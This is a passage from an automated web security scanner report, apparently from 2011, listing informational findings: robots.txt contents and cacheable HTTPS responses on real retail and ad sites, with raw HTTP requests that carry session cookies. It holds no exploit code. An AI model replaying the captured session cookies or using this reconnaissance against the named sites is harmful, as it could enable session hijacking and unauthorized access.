Server: Apache
Set-Cookie: TLTSID=48AA12C67F5F107F001EB2E881408840; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=48AA12C67F5F107F001EB2E881408840; Path=/; Domain=.ftd.com; expires=Mon, 16-05-2021 01:53:23 GMT
Vary: Accept-Encoding
Last-Modified: Wed, 19 Jan 2011 03:55:49 GMT
ETag: "ba-4d3660c5"
Content-Type: text/plain
Content-Length: 186
Date: Mon, 16 May 2011 01:53:23 GMT
X-Varnish: 767403390
Age: 0
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /1
Disallow: /2
Disallow: /3
Disallow: /4
Disallow: /5
Disallow: /6
Disallow: /7
Disallow: /8
Disallow: /9

Allow: /350/

Sitemap: http://www.ftd.com/sitemap.xml

22.91. http://www.gnc.com/home/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /home/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:17 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 22 Apr 2011 08:47:00 GMT
ETag: "67872c-12a-4a17de6ae2900"
Accept-Ranges: bytes
Content-Length: 298
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:57:17 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /coreg/
Disallow: /gcoreg/
Disallow: /cart/
Disallow: /cartHandler/
Disallow: /include/
Disallow: /checkout/
Disallow: /emailFriend/
Disallow: /emailSignup/

...[SNIP]...

22.92. https://www.gnc.com/coreg/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.gnc.com
Path:   /coreg/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:14:14 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 22 Apr 2011 08:47:00 GMT
ETag: "67872c-12a-4a17de6ae2900"
Accept-Ranges: bytes
Content-Length: 298
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 02:14:14 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /coreg/
Disallow: /gcoreg/
Disallow: /cart/
Disallow: /cartHandler/
Disallow: /include/
Disallow: /checkout/
Disallow: /emailFriend/
Disallow: /emailSignup/

...[SNIP]...

22.93. http://www.google-analytics.com/__utm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Mon, 16 May 2011 01:53:14 GMT
Expires: Mon, 16 May 2011 01:53:14 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

22.94. http://www.googleadservices.com/pagead/conversion/1052618686/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1052618686/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 09 May 2011 20:53:07 GMT
Date: Mon, 16 May 2011 01:55:04 GMT
Expires: Mon, 16 May 2011 01:55:04 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.95. http://www.guitarcenter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guitarcenter.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.guitarcenter.com

Response

HTTP/1.1 200 OK
Content-Length: 478
Content-Type: text/plain
Last-Modified: Fri, 10 Sep 2010 18:25:24 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
SN: 27
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:35 GMT
Connection: close

User-agent: *

Disallow: /Ajax/
Disallow: /CS/
Disallow: /Includes/CustomDirectGuitars/
Disallow: /Includes/Interstate/
Disallow: /Includes/MIRetail/
Disallow: /Includes/MyMusicStore/
Disallow
...[SNIP]...

22.96. https://www.guitarcenter.com/MyAccount/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.guitarcenter.com
Path:   /MyAccount/Default.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.guitarcenter.com

Response

HTTP/1.1 200 OK
Content-Length: 478
Content-Type: text/plain
Last-Modified: Fri, 10 Sep 2010 18:25:24 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
SN: 27
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:11:35 GMT
Connection: close

User-agent: *

Disallow: /Ajax/
Disallow: /CS/
Disallow: /Includes/CustomDirectGuitars/
Disallow: /Includes/Interstate/
Disallow: /Includes/MIRetail/
Disallow: /Includes/MyMusicStore/
Disallow
...[SNIP]...

22.97. http://www.helzberg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.helzberg.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.helzberg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 16:45:42 GMT
ETag: "74f-91f27980"
Content-Type: text/plain
Cache-Control: max-age=7200
Date: Mon, 16 May 2011 01:53:54 GMT
Content-Length: 1871
Connection: close

User-agent: *
Crawl-delay: 30
Request-rate: 1/30
Disallow: /admin/
<%-- Merge for Helzberg 5.7 upgrade - Feb 4, 2010 starts. --%>
Disallow: /account/
Disallow: /util/
Disallow: /ancillary/Than
...[SNIP]...

22.98. https://www.helzberg.com/account/login.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.helzberg.com
Path:   /account/login.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.helzberg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 16:45:25 GMT
ETag: "598-90ef1340"
Content-Type: text/plain
Cache-Control: max-age=7200
Date: Mon, 16 May 2011 10:45:13 GMT
Content-Length: 1432
Connection: close

User-agent: *
Disallow: /admin/
Disallow: /account/
Disallow: /util/
Disallow: /ancillary/ThankYou.jsp
Disallow: /ancillary/Unsubscribe.jsp
Disallow: /ancillary/custserv
Disallow: /api/
Disall
...[SNIP]...

22.99. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homedepot.ca
Path:   /webapp/wcs/stores/servlet/Home

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homedepot.ca

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Mar 2011 16:39:36 GMT
Content-Type: text/plain
Date: Mon, 16 May 2011 01:53:27 GMT
Content-Length: 379
Connection: close
Cache-Control: max-age=315360000
Expires: Mon, 10 May 2021 11:19:53 GMT

User-agent: *

Disallow: /webapp/wcs/stores/servlet/DisplayTemplate?storeId=10051&catalogId=10051&langId=-15&display=services_holmes
Disallow: /webapp/wcs/stores/servlet/DisplayTemplate?storeId=10051&
...[SNIP]...

22.100. http://www.imiclk.com/cgi/r.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imiclk.com
Path:   /cgi/r.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imiclk.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (CentOS)
Last-Modified: Tue, 22 Mar 2011 15:09:46 GMT
ETag: "1d807d-1a-49f13a27ae280"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Mon, 16 May 2011 01:57:30 GMT
Connection: close

User-agent: *
Disallow: /

22.101. http://www.linkedin.com/companyInsider

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /companyInsider

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-872004964"
Last-Modified: Wed, 06 Apr 2011 03:23:52 GMT
Content-Length: 24473
Connection: keep-alive
Date: Mon, 16 May 2011 10:22:42 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...

22.102. http://www.orderhouse.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orderhouse.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orderhouse.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 12 May 2009 16:37:42 GMT
Accept-Ranges: bytes
ETag: "0cf4cf81fd3c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:39:11 GMT
Connection: close
Content-Length: 239

...# robots.txt for http://www.orderhouse.com/

User-agent: *
Disallow: /Buyer/
Disallow: /BuyerAdmin/
Disallow: /Supplier/
Disallow: /SupplierAdmin/
Disallow: /Admin/
Disallow: /ScriptRe
...[SNIP]...

22.103. https://www.orderhouse.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.orderhouse.com
Path:   /default.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orderhouse.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 12 May 2009 16:37:42 GMT
Accept-Ranges: bytes
ETag: "0cf4cf81fd3c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:39:14 GMT
Connection: close
Content-Length: 239

...# robots.txt for http://www.orderhouse.com/

User-agent: *
Disallow: /Buyer/
Disallow: /BuyerAdmin/
Disallow: /Supplier/
Disallow: /SupplierAdmin/
Disallow: /Admin/
Disallow: /ScriptRe
...[SNIP]...

22.104. http://www.orientaltrading.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orientaltrading.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orientaltrading.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 03 Sep 2009 23:16:52 GMT
Accept-Ranges: bytes
Content-Length: 354
Content-Type: text/plain
Date: Mon, 16 May 2011 01:58:38 GMT
Connection: close

# robots.txt for http://www.orientaltrading.com/sitemap.xml

User-agent: *


#affiliates directory
Disallow: /application
Disallow: /aff/
Disallow: /business_edition/
Disallow: /carnival/
Disallow
...[SNIP]...

22.105. http://www.petco.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petco.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.petco.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Aug 2010 21:52:58 GMT
ETag: "bc6b7cbbb135cb1:107a"
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
X-Strangeloop: RCache
X-SL-RCache: Cached
Date: Mon, 16 May 2011 01:57:00 GMT
Content-Length: 267
Connection: close
Set-Cookie: sltest=T; path=/; domain=petco.com.

# Spider instructions for all web servers in the production pool
# Thu, 11 Dec 2008 06:18:00 -0400


# Exclude Files From All Robots:

User-agent: *
Disallow: /secure/
Disallow: /cart/
Disa
...[SNIP]...

22.106. http://www.petsmart.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petsmart.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:01 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 14 Aug 2009 08:45:06 GMT
ETag: "53c0d0-15b-4711611a3a880"
Accept-Ranges: bytes
Content-Length: 347
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:53:01 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /cart/
Disallow: /coreg/
Disallow: /checkout/
Disallow: /compare/
Disallow: /history/
Disallow: /include/
Disallow: /pop_ups/
Disallow: /cgi-bin/
Disallow: /
...[SNIP]...

22.107. https://www.petsmart.com/coreg/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.petsmart.com
Path:   /coreg/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:17:47 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 14 Aug 2009 08:45:06 GMT
ETag: "53c0d0-15b-4711611a3a880"
Accept-Ranges: bytes
Content-Length: 347
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:17:47 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /cart/
Disallow: /coreg/
Disallow: /checkout/
Disallow: /compare/
Disallow: /history/
Disallow: /include/
Disallow: /pop_ups/
Disallow: /cgi-bin/
Disallow: /
...[SNIP]...

22.108. http://www.redcrossstore.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcrossstore.org
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.redcrossstore.org

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 12 May 2009 16:37:42 GMT
Accept-Ranges: bytes
ETag: "0cf4cf81fd3c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:07:39 GMT
Connection: close
Content-Length: 239

...# robots.txt for http://www.orderhouse.com/

User-agent: *
Disallow: /Buyer/
Disallow: /BuyerAdmin/
Disallow: /Supplier/
Disallow: /SupplierAdmin/
Disallow: /Admin/
Disallow: /ScriptRe
...[SNIP]...

22.109. https://www.redcrossstore.org/Shopper/ContactInfo.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.redcrossstore.org
Path:   /Shopper/ContactInfo.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.redcrossstore.org

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 12 May 2009 16:37:42 GMT
Accept-Ranges: bytes
ETag: "0cf4cf81fd3c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:32:09 GMT
Connection: close
Content-Length: 239

...# robots.txt for http://www.orderhouse.com/

User-agent: *
Disallow: /Buyer/
Disallow: /BuyerAdmin/
Disallow: /Supplier/
Disallow: /SupplierAdmin/
Disallow: /Admin/
Disallow: /ScriptRe
...[SNIP]...

22.110. http://www.res-x.com/ws/r2/Resonance.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.res-x.com
Path:   /ws/r2/Resonance.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.res-x.com

Response

HTTP/1.1 200 OK
Content-Length: 55
Content-Type: text/plain
Last-Modified: Thu, 18 Jan 2007 19:00:12 GMT
Accept-Ranges: bytes
ETag: "08670e1323bc71:bde"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:45 GMT
Connection: close

# Disallow all web spiders
User-agent: *
Disallow: /

22.111. http://www.restorationhardware.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.restorationhardware.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.restorationhardware.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 03 Dec 2010 00:54:08 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: text/plain; charset=UTF-8
Date: Mon, 16 May 2011 01:53:13 GMT
Connection: close
Cache-Control: max-age=86400
Expires: Mon, 16 May 2011 20:07:10 GMT

User-agent: *
Disallow: /checkout/
Disallow: /email/
Disallow: /error/
Disallow: /modal/
Disallow: /my-account/
Disallow: /prototypes/
Disallow: /search/
Disallow: /sitewide/
Disallow: /store-portal/

22.112. https://www.restorationhardware.com/my-account/sign-in.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/sign-in.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.restorationhardware.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 03 Dec 2010 00:54:08 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: text/plain; charset=UTF-8
Date: Mon, 16 May 2011 02:09:57 GMT
Connection: close
Cache-Control: max-age=86400
Expires: Tue, 17 May 2011 02:09:57 GMT

User-agent: *
Disallow: /checkout/
Disallow: /email/
Disallow: /error/
Disallow: /modal/
Disallow: /my-account/
Disallow: /prototypes/
Disallow: /search/
Disallow: /sitewide/
Disallow: /store-portal/

22.113. http://www.siteadvisor.com/download/windows.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.siteadvisor.com
Path:   /download/windows.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.siteadvisor.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:41 GMT
Server: Apache
Last-Modified: Wed, 09 Jul 2008 02:03:21 GMT
ETag: "e017b-167-4518db6812c40"
Accept-Ranges: bytes
Content-Length: 359
Connection: close
Content-Type: text/plain

User-agent: Googlebot
Disallow: /cgi-bin/

User-agent: Slurp
Disallow: /cgi-bin/

User-agent: Yahoo-NewsCrawler
Disallow: /cgi-bin/

User-agent: msnbot
Disallow: /cgi-bin/

User-agent: Teoma
Disallow:
...[SNIP]...

22.114. http://www.toshibadirect.com/td/b2c/laptops.to

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toshibadirect.com
Path:   /td/b2c/laptops.to

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.toshibadirect.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:52 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Last-Modified: Mon, 19 Jan 2009 18:04:49 GMT
Accept-Ranges: bytes
Content-Length: 296
Connection: close
Content-Type: text/plain

# /robots.txt file for Toshiba

User-agent: *
Sitemap: /sitemap.xml.gz
Disallow: /cgi-bin/tais/pc/
Disallow: /cgi-bin/tais/pr/
Disallow: /cgi-bin/tais/cd/
Disallow: /td/b2c/cart.to
Disallow: /td/b2c/O
...[SNIP]...

22.115. https://www.toshibadirect.com/td/b2c/myaccount.to

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.toshibadirect.com
Path:   /td/b2c/myaccount.to

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.toshibadirect.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:45:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Last-Modified: Mon, 19 Jan 2009 18:04:49 GMT
Accept-Ranges: bytes
Content-Length: 296
Connection: close
Content-Type: text/plain

# /robots.txt file for Toshiba

User-agent: *
Sitemap: /sitemap.xml.gz
Disallow: /cgi-bin/tais/pc/
Disallow: /cgi-bin/tais/pr/
Disallow: /cgi-bin/tais/cd/
Disallow: /td/b2c/cart.to
Disallow: /td/b2c/O
...[SNIP]...

22.116. http://www.travelguard.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelguard.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.travelguard.com

Response

HTTP/1.1 200 OK
Content-Length: 2627
Content-Type: text/plain
Content-Location: http://www.travelguard.com/robots.txt
Last-Modified: Wed, 21 Apr 2010 09:06:38 GMT
Accept-Ranges: bytes
ETag: "30eb7f331e1ca1:13c8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:59:37 GMT
Connection: close

User-agent: *
Disallow: /911
Disallow: /ads
Disallow: /agentlink
Disallow: /bin
Disallow: /canada
Disallow: /cgi-bin
Disallow: /cgi-bin-
Disallow: /claims
Disallow: /compare
Disallow: /conta
...[SNIP]...

22.117. http://www26.orientaltrading.com/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www26.orientaltrading.com
Path:   /cm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www26.orientaltrading.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:11 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "17d65d-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=940
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

23. Cacheable HTTPS response
There are 26 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


23.1. https://ordering.ftd.com/empty/index.epl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /empty/index.epl

Request

GET /empty/index.epl HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/signin/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:10:37 GMT
Server: Apache
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
Cache-Control: max-age=86400
Connection: close
Content-Type: text/html
Content-Length: 154

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><title>Empty Page</title></head>
<body>
<!-- empty page -->

</body>
</html>

23.2. https://secure.bluenile.com/accounts/account-sign-in.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bluenile.com
Path:   /accounts/account-sign-in.html

Request

GET /accounts/account-sign-in.html HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; stc=3NZR3Q; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false; pop=sweeps~1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=C4A385CE7874D0A2B551FC74E3744D04; Path=/; Secure
Set-Cookie: bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:06:40 GMT; Path=/
Set-Cookie: SID=""; Domain=.bluenile.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; Domain=.bluenile.com; Expires=Tue, 15-May-2012 02:06:40 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 63219


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Your
...[SNIP]...

23.3. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.orientaltrading.com
Path:   /ui/userProfile/processRequest.do

Request

GET /ui/userProfile/processRequest.do?requestURI=displayLogin HTTP/1.1
Host: secure.orientaltrading.com
Connection: keep-alive
Referer: http://www.orientaltrading.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=17jLNQBXSqTLZLn22gSGhQZ1qn1JzhCKMpsNG12T0S6Y29Lzpcvx!-2120161015; otc_visitor_id=U6c411c8e35469d5c3d093388c1dc89a2; otc_new_mktg_visitor=21758503; CoreM_State=61~1.0~-1~-1~E~3~3~5~3~3~7~7~|~~|~~|~~|~||||||; mt.v=1.322159034.1305510206640; fsr.s={"v":1,"rid":"1305510222528_763877","pv":2,"to":5,"c":"http://www.orientaltrading.com/","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"f":1305510848788}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=LSR0NQ5JncTchv2GrGWHyGDfvFpDKhs5c5ThHL92VQvcmKBTQLms!-2120161015; domain=.orientaltrading.com; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 85683


                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


       
...[SNIP]...

23.4. https://secure.orientaltrading.com/uiframework/skins/default/js/shoppingCart.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.orientaltrading.com
